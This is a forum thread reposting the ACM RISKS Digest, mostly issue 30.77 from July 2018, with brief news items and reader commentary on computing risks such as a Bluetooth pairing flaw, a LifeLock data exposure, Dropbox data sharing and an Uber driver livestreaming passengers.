    Sami has extensive background (NSA, DARPA), and has managed to squeeze a lot
    of it into the book.

    http://www.engineeringtrustworthysystems.com

    The endorsements on the back cover and front-end material are copious, so I
    am not going to even begin to cite some of them here. They are available at
    https://samisaydjari.com/reviews-1/ .

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.76
    ************************
     
  12. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    4,755
    483
    283
    Apr 3, 2007
    Tampa
    Risks Digest 30.77

    RISKS List Owner

    Jul 30, 2018 2:57 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Monday 30 July 2018 Volume 30 : Issue 77

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    California Wants to Reinvent the Power Grid. So What Could Go Wrong?
    (NYTimes)
    Reporter Shows The Links Between The Men Behind Brexit And The
    Trump Campaign (NPR)
    Russian Hackers Reach U.S. Utility Control Rooms, Homeland Security
    Officials Say (WSJ)
    Israeli researchers say they've found better way to spot malicious
    emails (The Times of Israel)
    Man in the middle (Forbes e-news)
    Senator vs. Flash (Fortune)
    Decade-Old Bluetooth Flaw Lets Hackers Steal Data Passing Between
    Devices (Dan Goodin)
    Today, 100 Americans Will Likely Die on Our Roads (New York Times)
    The Ordinary License Plate's Days May Be Numbered (NYTimes)
    LifeLock Bug Exposed Millions of Customer Email Addresses (Krebs)
    For Sale: Survey Data on Millions of High School Students (NYTimes)
    First Ringless Voicemail Message TCPA Decision Sides With Plaintiff
    (Manatt)
    Travelodge data hacked in 'security incident' (The Caterer)
    Indictment: Wichita Attorney Brad Pistotnik, software engineer
    charged in alleged cyberattacks (KWCH)
    When a Stranger Decides to Destroy Your Life (Gizmodo)
    Second-hand land rover data may stay under control of first owner
    (The Register)
    This company is building a massive pack of robot dogs for purchase
    starting in 2019 (WashPo)
    Waymo partners with Walmart to shuttle customers in self-driving cars
    (WashPo)
    Cox phone service alert (Gabe Goldberg)
    Nintendo to ROM sites: Forget cease-and-desist, now we're suing
    (Ars Technica)
    Venmo's terrible idea (Ars Technica)
    Boston woman temporarily becomes a millionaire after an account mix-up
    (The Boston Globe)
    A few extra zeroes causes a big headache (The Boston Globe)
    Uber driver is livestreaming riders without their knowledge or consent
    (StL Today via Lauren Weinstein)
    Wild About Tech, China Even Loves Robot Waiters That Can't Serve (NY Times)
    MASSIVE ethical failure and privacy violation by Dropbox (WiReD)
    Was It Ethical for Dropbox to Share Customer Data with Scientists? (WiReD)
    Why is Google Translate spitting out sinister religious prophecies?
    (Motherboard)
    Google DRM for Email can be disabled by ticking a few boxes in
    Firefox (Boing Boing)
    How Google's Safe Browsing Helped Build a More Secure Web (WiReD)
    Orrin Hatch tweeted at Google that he's not dead (Insider)
    Nationals' Trea Turner is the latest MLB player to have ugly tweets
    uncovered (WashPo)
    Braves' Sean Newcomb addresses ugly old tweets right after just
    missing a no-hitter (WashPo)
    Data allowing people to print out their own guns temporarily
    blocked from Internet in PA, after legal pressure. (WashPo)
    Re: employees as subjects in clinical trials (Robert R. Fenichel)
    A few short replies to RISKS-30.76 (Jeff Jonas)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Sat, 21 Jul 2018 10:03:02 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: California Wants to Reinvent the Power Grid. So What Could Go Wrong?
    (NYTimes)

    California Wants to Reinvent the Power Grid. So What Could Go Wrong?

    Two decades ago, a new approach to power delivery led to blackouts. Now the
    state is considering another energy makeover: a regional electric grid.

    ------------------------------

    Date: Fri, 20 Jul 2018 22:43:30 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Reporter Shows The Links Between The Men Behind Brexit And The
    Trump Campaign (NPR)



    ------------------------------

    Date: Tue, 24 Jul 2018 19:00:46 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Russian Hackers Reach U.S. Utility Control Rooms, Homeland Security
    Officials Say (WSJ)

    Blackouts could have been caused after the networks of trusted vendors were
    easily penetrated

    Russian Hackers Reach U.S. Utility Control Rooms, Homeland Security Officials Say

    ------------------------------

    Date: Fri, 20 Jul 2018 19:53:24 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Israeli researchers say they've found better way to spot malicious
    emails (The Times of Israel)

    ``Existing email analysis solutions only analyze specific email elements
    using rule-based methods, and don't analyze other important parts,'' said
    Nir Nissim, head of the David and Janet Polak Family Malware Lab at the
    cyber department of the university. Antivirus software solutions mainly use
    ``signature-based detection methods, and therefore are insufficient for
    detecting new, unknown malicious emails.''

    The new method, called Email-Sec-360, was developed by Aviad Cohen, a PhD
    student and researcher at the BGU Malware Lab. The research, published in
    the scientific journal Expert Systems with Applications, is based on machine
    learning methods and makes use of 100 general descriptive features extracted
    from the various components of emails, including the header, its body and
    attachments. The methodology provides ``enhanced threat detection in real
    time,'' the statement said.

    Israeli researchers say they’ve found better way to spot malicious emails

    Perhaps too narrow and general description of "existing" solutions and too
    excited about "machine learning methods and makes use of 100 general
    descriptive features".

    ------------------------------

    Date: Thu, 26 Jul 2018 09:52:35 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Man in the middle (Forbes e-news)

    A pair of Israeli researchers found a flaw in the encryption scheme securing
    *Bluetooth* file transfers that could allow hackers to steal data. Many
    device makers have already issued security patches, so make sure your phone
    software is up to date.
    Error

    ------------------------------

    Date: Fri, 27 Jul 2018 18:33:11 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Senator vs. Flash (Fortune)

    *Out of the frying pan*. The once-ubiquitous (and hated by Steve Jobs) web
    display software known as *Flash* is going away in less than two years,
    according to its maker, *Adobe*. But the U.S. government hasn't got the
    message, prompting Sen. Ron Wyden to send a letter to three federal agencies
    to get a move on removing Flash pronto. The software has "serious, largely
    unfixable cybersecurity issues," Wyden wrote.

    Error

    ------------------------------

    Date: Mon, 30 Jul 2018 12:23:48 -0400
    From: ACM TechNews <technew...@acm.org>
    Subject: Decade-Old Bluetooth Flaw Lets Hackers Steal Data Passing Between
    Devices (Dan Goodin)

    Ars Technica (07/25/18) Dan Goodin via ACM TechNews, Monday, July 30, 2018

    A study from the Technion-Israel Institute of Technology warns of a
    decade-old bug in the Bluetooth specification that allows hackers to
    intercept and tamper with data shared wirelessly through man-in-the-middle
    attacks on the link between devices. Not only can hackers view the data,
    but they can forge keystrokes on a Bluetooth keyboard to open up a command
    window or malicious website. Says security engineer JP Smith, "This attack
    lets an attacker who can read and modify Bluetooth traffic during pairing
    force the key to be something they know." The researchers say the attack is
    enabled by two design flaws: one involves sending both the x-coordinate and
    the y-coordinate during the public key exchange, while the other is the
    protocol's authentication of only the x-coordinate.

    http://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-1c2c9x21684dx072162&

    ------------------------------

    Date: Sat, 28 Jul 2018 10:50:01 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Today, 100 Americans Will Likely Die on Our Roads (New York Times)

    Opinion | Today, 100 Americans Will Likely Die on Our Roads

    "But the current mismatch between the attention to driverless cars and the
    attention to driver-operated cars is a big mistake. We're acting as if the
    status quo is fine, and the only problem is some risky newfangled
    technology. In reality, the status quo is a public- health crisis, and a
    preventable one.

    "Today, another 100 or so Americans -- many of them young and healthy --
    will likely die in human-driven vehicle crashes. Even more Americans are
    likely to die on Saturday, the deadliest day of the week on the roads. The
    terrible toll will continue every day after that, until we decide to do
    something about it."

    ~100 deaths per day from carbon-based drivers v. 3 documented silicon-
    related vehicle deaths to date.

    Risk is usually characterized by severity (critical, high, medium, low)
    and probability (high, medium, low) attributes. One alternative
    characterization is RISK = HAZARD + OUTRAGE. This expression clearly
    quantifies a risk: (1) a known hazard; and, (2) accompanying outrage
    if/when the hazard materializes
    (Risk = Hazard + Outrage: Coping with Controversy about Utility Risks (Peter M. Sandman website))

    By the 2nd risks characterization, AV hazard is trivial compared to
    daily experience, but each AV incident is disproportionately accorded
    hyperbolic viral media attention (exponentiated outrage).

    ------------------------------

    Date: Sat, 28 Jul 2018 11:05:54 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: The Ordinary License Plate's Days May Be Numbered (NYTimes)

    (The New York Times, 26 Jul 2018)
    The Ordinary License Plate’s Days May Be Numbered

    Another Internet of mistakes target awaiting exploitation by a botnet near
    you.

    ------------------------------

    Date: Wed, 25 Jul 2018 19:09:36 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: LifeLock Bug Exposed Millions of Customer Email Addresses (Krebs)

    via NNSquad
    LifeLock Bug Exposed Millions of Customer Email Addresses — Krebs on Security

    Identity theft protection firm LifeLock -- a company that's built a name
    for itself based on the promise of helping consumers protect their
    identities online -- may have actually exposed customers to additional
    attacks from ID thieves and phishers. The company just fixed a
    vulnerability on its site that allowed anyone with a Web browser to index
    email addresses associated with millions of customer accounts, or to
    unsubscribe users from all communications from the company.

    Pretty much the oldest trick in the book, too.

    [Gabe Goldberg noted that *LifeLock* wasn't protecting its customers'
    email addresses, which could be seen on the web. The service went offline
    briefly on Wednesday to fix the leaky web page.
    Error
    ]

    ------------------------------

    Date: Mon, 30 Jul 2018 10:58:54 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: For Sale: Survey Data on Millions of High School Students (NYTimes)

    For Sale: Survey Data on Millions of High School Students

    College-planning surveys give a peek into the opaque and little-regulated
    market of data-mining of minors.

    ------------------------------

    Date: Mon, 30 Jul 2018 09:51:01 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: First Ringless Voicemail Message TCPA Decision Sides With Plaintiff
    (Manatt)

    First Ringless Voicemail Message TCPA Decision Sides With Plaintiff

    ------------------------------

    Date: Sat, 28 Jul 2018 14:05:26 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Travelodge data hacked in 'security incident' (The Caterer)

    http://www.thecaterer.com/articles/531764/travelodge-data-hacked-in-security-incident

    ------------------------------

    Date: Mon, 23 Jul 2018 00:38:47 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Indictment: Wichita Attorney Brad Pistotnik, software engineer
    charged in alleged cyberattacks

    http://www.kwch.com/content/news/In...Was-Working-for-Wichita-Lawyer-488441491.html

    ------------------------------

    Date: Sat, 28 Jul 2018 23:57:52 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: When a Stranger Decides to Destroy Your Life (Gizmodo)

    Monika Glennon has lived in Huntsville, Alabama, for the last 12 years.
    Other than a strong Polish accent, she fits a certain stereotype of the
    All-American life. She's blonde. Her husband is a veteran Marine. Her two
    children, a boy and a girl, joined the military as adults. She sells houses
    -- she's a real estate agent at Re/Max -- helping others realize their own
    American dream.

    But in September 2015, she was suddenly plunged into an American
    nightmare. She got a call at 6 a.m. one morning from a colleague at Re/Max
    telling her something terrible had been posted about her on the Re/Max
    Facebook page. Glennon thought at first she meant that a client had left her
    a bad review, but it turned out to be much worse than that.

    http://gizmodo.com/when-a-stranger-decides-to-destroy-your-life-1827546385

    The risk? People.

    ------------------------------

    Date: Sun, 29 Jul 2018 19:33:08 +0200
    From: Benoit Goas <goa...@hawk.iit.edu>
    Subject: Second-hand land rover data may stay under control of first owner
    (The Register)

    Some land rovers can be linked to an account allowing to track them, unlock
    them and more. It has to be transferred / disabled on car sale, if you
    don't forget about it and/or go through an official car dealer... Else the
    first owner keeps some control over the car!

    http://www.theregister.co.uk/2018/07/27/jaguar_land_rover_connected_car_privacy/

    ------------------------------

    Date: Fri, 27 Jul 2018 09:44:09 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: This company is building a massive pack of robot dogs for purchase
    starting in 2019 (WashPo)

    http://www.washingtonpost.com/techn...k-robot-dogs-purchase-starting/?noredirect=on

    "These robots from Boston Dynamics are incredibly rugged and robust, which
    makes them capable of addressing the clutter and uncertainty of our
    chaotic human world," Srinivasa said. "Some people watching the robot
    on video find their capabilities scarily anthropomorphic and humanlike,
    but to me it shows that there is a robot I can have in my home that will
    not break things or harm people."

    This bot brings new meaning to the term "doggie breath." I wonder if it
    can be trained to play fetch, retrieve a newspaper, or bark at
    strangers? The idea of doggiebot as a household pet is unsettling. Safe
    for the whole family, especially cats and infants?

    A robot bull in a china-shop should it misinterpret a voice-
    communicated command (if that sensor interface is sponsored).

    ------------------------------

    Date: Thu, 26 Jul 2018 16:45:56 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Waymo partners with Walmart to shuttle customers in self-driving
    cars (WashPo)

    http://www.washingtonpost.com/techn...le-customers-self-driving-cars/?noredirect=on

    Probably safer to send Boston Dynamics' SpotMini with a shopping list to
    fetch pretzels and beer than take a WayMo.
    (http://www.washingtonpost.com/techn...ng-massive-pack-robot-dogs-purchase-starting/>

    ------------------------------

    Date: Fri, 27 Jul 2018 16:09:11 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Cox phone service alert

    Fun with VoIP...

    -------- Forwarded Message --------
    > Subject: If you have Cox phone service you may experience trouble
    > contacting 9-1-1. All Fairfax County 9-1-1 functions are in service.
    > Date: Fri, 27 Jul 2018 17:21:43 +0000 (UTC)

    *This is a message from Fairfax Alerts*

    If you have Cox phone service you may experience trouble contacting 9-1-1.
    All Fairfax County 9-1-1 functions are in service. Please use a wireless
    phone to reach 9-1-1 if you experience trouble. Text-to-9-1-1 is also
    available.

    The cause of the issue is a Cox Communications service interruption near the
    area of Georgetown Pike and Bellview Road. There is not an estimated time of
    repair at this time.

    ------------------------------

    Date: Tue, 24 Jul 2018 00:02:46 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Nintendo to ROM sites: Forget cease-and-desist, now we're suing
    (Ars Technica)

    http://arstechnica.com/gaming/2018/07/nintendo-to-rom-sites-forget-cease-and-desist-now-were-suing/

    ------------------------------

    Date: Tue, 24 Jul 2018 00:05:12 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Venmo's terrible idea (Ars Technica)

    http://arstechnica.com/tech-policy/2018/07/venmos-terrible-idea/

    ------------------------------

    Date: Sat, 21 Jul 2018 02:53:02 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Boston woman temporarily becomes a millionaire after an account mix-up
    (The Boston Globe)

    http://www.boston.com/news/local-ne...becomes-a-millionaire-after-an-account-mix-up

    ------------------------------

    Date: Sat, 21 Jul 2018 03:19:44 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: A few extra zeroes causes a big headache (The Boston Globe)

    http://www.bostonglobe.com/business...ig-headache/8kquT0q25v8XH6mYTzLt9N/story.html

    Somehow, instead of paying $182.36 and $92.60 via her online account, she
    paid $18,236 and $9,260. Whether she inadvertently typed in a couple of
    extra zeros -- thus paying 100 times what she owed -- or the software on her
    account went haywire, she doesn't know. ...

    ------------------------------

    Date: Sat, 21 Jul 2018 07:56:30 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Uber driver is livestreaming riders without their knowledge or consent

    via NNSquad [UNACCEPTABLE!]

    St. Louis Uber driver has put video of hundreds of passengers online.
    Most have no idea.

    http://www.stltoday.com/news/local/...cle_9060fd2f-f683-5321-8c67-ebba5559c753.html

    But there was something the women didn't know: Their driver was streaming
    a live video of them to the Internet, and comments from viewers were
    pouring in. The blonde is a 7, the brunette a 5, someone with the
    username "DrunkenEric" commented. "She doesn't sit like a lady though,"
    another viewer added. "This is creepy," said another. The women are
    among hundreds of St. Louis area Uber passengers who have been streamed
    online without their knowledge by their driver, Jason Gargac, 32, of
    Florissant. Gargac has given about 700 rides in the area since March
    through Uber, plus more with Lyft. Nearly all have been streamed to his
    channel on Twitch, a live video website popular with video gamers where
    Gargac goes by the username "JustSmurf." Passengers have included
    children, drunk college students and unwitting public figures such as a
    KSDK reporter and Jerry Cantrell, lead guitarist with the band Alice in
    Chains. First names, and occasionally full names, are revealed. Homes are
    shown. Passengers have thrown up, kissed, talked trash about relatives and
    friends and complained about their bosses in Gargac's truck. All the
    while, an unseen online audience watches, evaluating women's bodies,
    judging parents and mocking conversations.

    UNACCEPTABLE! Irrespective of the legality, Uber, Lyft, and other similar
    services must ban this practice among their drivers, or face serious
    repercussions going forward. Drivers violating such bans must be excised
    from the services. This must be dealt with IMMEDIATELY or these services
    risk losing all trust from their passengers.

    ------------------------------

    Date: Sun, 22 Jul 2018 13:18:16 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Wild About Tech, China Even Loves Robot Waiters That Can't Serve
    (NY Times)

    http://www.nytimes.com/2018/07/21/technology/china-future-robot-waiters.html

    Whereas comp.risks readers are generally inured (or incensed) by
    technology's weaknesses and vulnerabilities, the PRC's population embraces
    robotic service deployment. Novelty impresses, especially if there's an yuan
    to earn from it.

    "Waiters said their automated counterparts caused more work than they
    saved. The robots take trays of food out to customers, but are unable to
    lower them to the table. Real waiters stand back so photos and videos can
    be taken before shuffling in and serving food the old-fashioned way.

    "The robots also break down. Three times during an hour lunch, a waiter
    had to lean a robot on its side and take a blowtorch to the undercarriage
    to burn out food and trash caught in its axles. When asked whether he was
    worried that the robots would take his job, the waiter laughed.

    "Still, patrons were impressed.

    "I've just been to America, and I didn't see many new things at all," said
    Xie Aijuan, a retiree in her 50s. "I don't think they have anything like
    robotic restaurants there."

    "China is surpassing America," agreed her dining companion, Zhuang
    Jiazheng. "Robots are coming. Tech is advancing. It's all a matter of
    time."

    A Caesar salad served by R2D2 today, and a killbot tomorrow. PRC
    investors, especially the government, look long term for returns.

    Will a no-op robot restaurant open in the US? When customers assent to
    restaurant owner indemnification against a hot bouillabaisse spill or
    flambe' by Bananas Foster.

    ------------------------------

    Date: Tue, 24 Jul 2018 17:38:08 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: MASSIVE ethical failure and privacy violation by Dropbox (WiReD)

    via NNSquad
    http://www.wired.com/story/dropbox-sharing-data-study-ethics/

    But it still appears this research was conducted without the express
    consent of the thousands of customers whose information Dropbox and the
    researchers accessed (the HBR article originally suggested that 400,000
    users' data was analyzed, while Dropbox says that the study dealt with
    data from 16,000 customers). Late Tuesday HBR added a second editors' note
    indicating that the researchers started with information on 400,000
    "unique users" but pared the data set down to 16,000 after incorporating
    data from Web of Science. HBR editors also updated the article to
    indicate that it wasn't 1,000 universities that were included, but rather
    1,000 separate departments. Informed consent, one of the cornerstones of
    academic research, is one of the things that got Facebook in so much
    trouble back in 2014 ...

    ------------------------------

    Date: Wed, 25 Jul 2018 09:40:30 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Was It Ethical for Dropbox to Share Customer Data with Scientists?
    (WiReD)

    <http://www.dropbox.com/privacy>

    Dropbox representatives told WIRED that users gave consent when they agreed
    to the company's privacy terms and pointed to a section of that policy about
    how data will be used to improve Dropbox services. That section reads: "We
    collect information related to how you use the Services, including actions
    you take in your account (like sharing, editing, viewing, and moving files
    or folders). We use this information to improve our Services, develop new
    services and features, and protect Dropbox users." They also pointed to
    language about sharing data with third parties, which says "Dropbox uses
    certain trusted third parties (for example, providers of customer support
    and IT services) to help us provide, improve, protect, and promote our
    Services."

    Exactly how the study improved Dropbox services was not clear from the HBR
    article or the Dropbox blog post, though Dropbox representatives told WIRED
    the insights into how teams collaborate would help the company design better
    features.

    http://www.wired.com/story/dropbox-sharing-data-study-ethics/

    ------------------------------

    Date: Sun, 22 Jul 2018 14:00:40 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Why is Google Translate spitting out sinister religious prophecies?
    (Motherboard)

    Google Translate is moonlighting as a deranged oracle -- and experts say
    it's likely because of the spooky nature of neural networks.

    http://motherboard.vice.com/en_us/a...te-spitting-out-sinister-religious-prophecies

    Garbage in, "gospel" out? Which other neural networks can be corrupted by
    nonsense? Maybe Star Trek had it right, Kirk destroying evil computers by
    feeding them jabberwocky...

    ------------------------------

    Date: Sun, 22 Jul 2018 17:24:38 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Google DRM for Email can be disabled by ticking a few boxes in
    Firefox (Boing Boing)

    http://boingboing.net/2018/07/22/adversarial-interop.html

    ------------------------------

    Date: Sun, 22 Jul 2018 17:30:31 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: How Google's Safe Browsing Helped Build a More Secure Web (WiReD)

    http://www.wired.com/story/google-safe-browsing-oral-history/

    ------------------------------

    Date: Tue, 24 Jul 2018 13:21:40 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Orrin Hatch tweeted at Google that he's not dead (Insider)

    http://www.thisisinsider.com/orrin-hatch-tweeted-google-not-dead-2018-7

    Hmm, Wikipedia isn't gospel; who knew...

    ------------------------------

    Date: Mon, 30 Jul 2018 08:00:18 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Nationals' Trea Turner is the latest MLB player to have ugly tweets
    uncovered (WashPo)

    A Nationals spokeswoman said the team is aware of the racially insensitive
    and homophobic tweets and is gathering more information.

    http://www.washingtonpost.com/news/...est-mlb-player-to-have-ugly-tweets-uncovered/

    ------------------------------

    Date: Mon, 30 Jul 2018 08:01:34 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Braves' Sean Newcomb addresses ugly old tweets right after just
    missing a no-hitter (WashPo)

    The second-year Atlanta starter's roller coaster Sunday capped
    a far more eventful late-July MLB series than usual.

    http://www.washingtonpost.com/news/...-tweets-right-after-just-missing-a-no-hitter/

    ------------------------------

    Date: Mon, 30 Jul 2018 08:05:50 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Data allowing people to print out their own guns temporarily
    blocked from Internet in PA, after legal pressure. (WashPo)

    Distribution of the schematics allowing people to make homemade guns is
    protected by the First Amendment, the company argues.

    http://www.washingtonpost.com/news/...ked-from-internet-in-pa-after-legal-pressure/

    ------------------------------

    Date: Sat, 21 Jul 2018 11:29:49 -0700
    From: "Robert R. Fenichel" <b...@fenichel.net>
    Subject: Re: employees as subjects in clinical trials (Maziuk, RISKS-30.76)

    Dmitri Maziuk says "I'm not quite sure what makes med AI coders so
    different" from medical researchers, but the difference is in the stage of
    the activity (routine vs. experimental), not in the personnel.

    Medical research (clinical trials) is regulated differently from medical
    practice, and the ethical restrictions are different, too, RCTs are tightly
    regulated (by FDA, Health Canada, EMEA, or similar bodies in other
    countries) and by Institutional Review Boards, with ethicists chiming in on
    every detail. Medical practice is loosely regulated by state licensing
    boards and hospital committees, with practitioners mostly left to practice
    as they see fit.

    The extreme case is first-in-man trials of a new drug. They offer no
    benefit to the subjects, who usually don't have the disease that the drug is
    hoped to treat. I'm glad that there are people who will volunteer to be
    subjects in those trials, but no one could be forced to do it. Maziuk
    reports that El Al maintenance crews are required to be passengers, but they
    are presumably not required to be test pilots.

    Robert R. Fenichel, M.D., http://www.fenichel.net

    ------------------------------

    Date: Sun, 22 Jul 2018 20:02:55 -0400
    From: Jeff Jonas <je...@panix.com>
    Subject: A few short replies to RISKS-30.76

    replying to Richard M Stein
    Subject: The cameras that know if you're happy - or a threat (bbc.com)

    "This technology motivates the old aphorism to
    "Keep smiling, the boss likes idiots."

    Starbuck's already does that: hires and rewards people who smile.
    A lot. All the time.
    http://valuesdrivenresults.com/starbucks-hires-best/

    *****

    replying to Richard M Stein
    Subject: China Expands Surveillance of Sewage to Police Illegal Drug Use

    "April Fools for 2019:
    The PRC expands surveillance to detect halitosis and BO."

    1) Bad breath can be indicative of medical problems (cavities), but the term
    "halitosis" was allegedly a marketing ploy:

    http://www.smithsonianmag.com/smart-news/marketing-campaign-invented-halitosis-180954082/

    2) Homeless people are being harassed more than ever. Everywhere. In some
    countries, it is illegal to be homeless where the police will harass and
    beat them with impunity. There are already sensors to deter folks from
    using elevators as restrooms. I fear data and sensor fusion will make a more
    hostile environment for the already desperate:
    http://en.wikipedia.org/wiki/Anti-homelessness_legislation

    On the bright side, in Elizabeth NJ
    "2 homeless men found bombs, saved lives"
    http://www.nj.com/union/index.ssf/2016/09/homeless_men_found_bombs_saved_lives_walked_with_a.html

    *****

    replying to Benoit Goas
    Subject: Micro SD cards silently switching to read-only when they're "too old"

    "The 64G Patriot micro SD ... just decided to turn itself into a
    read-only memory card."

    That seems like a reasonable fail-safe to the end of life condition, but
    1) as mentioned, most software/firmware does not detect the condition
    2) when it switches from read/write to read-only,
    I fear some file system data might not get written,
    leading to unrepairable inconsistencies.
    The operating system understands what data is higher priority
    but the SD card probably cannot infer that.
    3) it's a lot better than the way hard drives tend to fail
    so catastrophically that all data is lost.

    *****

    replying to Benoit Goas
    Subject: Birds are making expensive roaming calls (The Register)

    "A new risk when tracking birds (or any other kind of stuff):
    someone manage to recover the SIM card from the tracker, and used it!"

    A bright side of IoT: some cellphone providers have SIM card plans for low
    data usage, perhaps with usage caps such as texting/SMS only.

    *****

    replying to Monty Solomon
    Subject: Robo-calls are getting worse.

    Some **** thinks that engineers want to get phone calls and talk about their
    trade-journal subscriptions instead of just completing a bingo-card or web
    form. That's why I rarely answer my phone during the day. The moment I
    answer ONE call, I'm flooded with more. I suspect I'm flagged on their
    sucker's list: answer one call and obviously you're interested in more. All
    day.

    They're poisoning their own well.

    *****

    replying to Benoit Goas
    Subject: We're not allowed to die anymore (NYTimes)

    "In the same kind of problems, a(n old) friend of mine died recently, and
    facebook want me to organize an event for his birthday"

    1) Consider http://leonardbernstein.com/at100
    Leonard Bernstein at 100 is the world-wide celebration
    of the 100th birthday of Leonard Bernstein,
    the composer, conductor, educator, musician, cultural ambassador,
    and humanitarian, officially beginning on August 25, 2017

    2) Not only the famous get such consideration. Several friends have
    recently died. Friends and family want their Internet social-media to
    remain intact to remember and honor them.

    3) the Jewish "unveiling" ceremony honors the deceased, normally a year
    after the burial. My take is that it's mostly for the family to remember
    and honor the person, not to forget them.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.77
    ************************
     
  13. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    4,755
    483
    283
    Apr 3, 2007
    Tampa
    Risks Digest 30.79

